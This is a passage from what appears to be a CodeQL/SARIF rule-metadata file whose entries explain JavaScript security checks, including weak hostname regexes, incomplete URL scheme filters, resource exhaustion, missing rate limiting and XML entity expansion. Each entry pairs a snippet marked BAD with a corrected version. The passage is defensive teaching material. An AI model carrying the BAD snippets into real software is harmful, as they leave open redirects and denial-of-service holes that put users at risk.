expected."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    let regex = /^((www|beta).)?example.com/;\n    if (host.match(regex)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    let regex = /^((www|beta).)?example.com/;\n    if (host.match(regex)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.","id":"js/incomplete-hostname-regexp","kind":"problem","name":"Incomplete regular expression for hostnames","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/incomplete-url-scheme-check","name":"js/incomplete-url-scheme-check","shortDescription":{"text":"Incomplete URL scheme check"},"fullDescription":{"text":"Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n","markdown":"# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n"},"properties":{"tags":["security","correctness","external/cwe/cwe-020","external/cwe/cwe-184"],"description":"Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n              and \"data:\" suggests a logic error or even a security vulnerability.","id":"js/incomplete-url-scheme-check","kind":"problem","name":"Incomplete URL scheme check","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/overly-large-range","name":"js/overly-large-range","shortDescription":{"text":"Overly permissive regular expression range"},"fullDescription":{"text":"Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Overly permissive regular expression ranges match a wider range of characters than intended.\n              This may allow an attacker to bypass a filter or sanitizer.","id":"js/overly-large-range","kind":"problem","name":"Overly permissive regular expression range","precision":"high","problem.severity":"warning","security-severity":"4.0"}},{"id":"js/useless-regexp-character-escape","name":"js/useless-regexp-character-escape","shortDescription":{"text":"Useless regular-expression character escape"},"fullDescription":{"text":"Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n    isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n    isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Prepending a backslash to an ordinary character in a string\n              does not have any effect, and may make regular expressions constructed from this string\n              behave unexpectedly.","id":"js/useless-regexp-character-escape","kind":"problem","name":"Useless regular-expression character escape","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/resource-exhaustion","name":"js/resource-exhaustion","shortDescription":{"text":"Resource exhaustion"},"fullDescription":{"text":"Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n","markdown":"# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n"},"properties":{"tags":["security","external/cwe/cwe-400","external/cwe/cwe-770"],"description":"Allocating objects or timers with user-controlled\n              sizes or durations can cause resource exhaustion.","id":"js/resource-exhaustion","kind":"path-problem","name":"Resource exhaustion","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/missing-rate-limiting","name":"js/missing-rate-limiting","shortDescription":{"text":"Missing rate limiting"},"fullDescription":{"text":"An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n  windowMs: 15 * 60 * 1000, // 15 minutes\n  max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n  windowMs: 15 * 60 * 1000, // 15 minutes\n  max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-770","external/cwe/cwe-307","external/cwe/cwe-400"],"description":"An HTTP request handler that performs expensive operations without\n              restricting the rate at which operations can be carried out is vulnerable\n              to denial-of-service attacks.","id":"js/missing-rate-limiting","kind":"problem","name":"Missing rate limiting","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/xml-bomb","name":"js/xml-bomb","shortDescription":{"text":"XML internal entity expansion"},"fullDescription":{"text":"Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n  expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = new expat.Parser();\n  parser.on(\"startElement\", handleStart);\n  parser.on(\"text\", handleText);\n  parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&amp;`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = sax.parser(true);\n  parser.onopentag = handleStart;\n  parser.ontext = handleText;\n  parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n  expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = 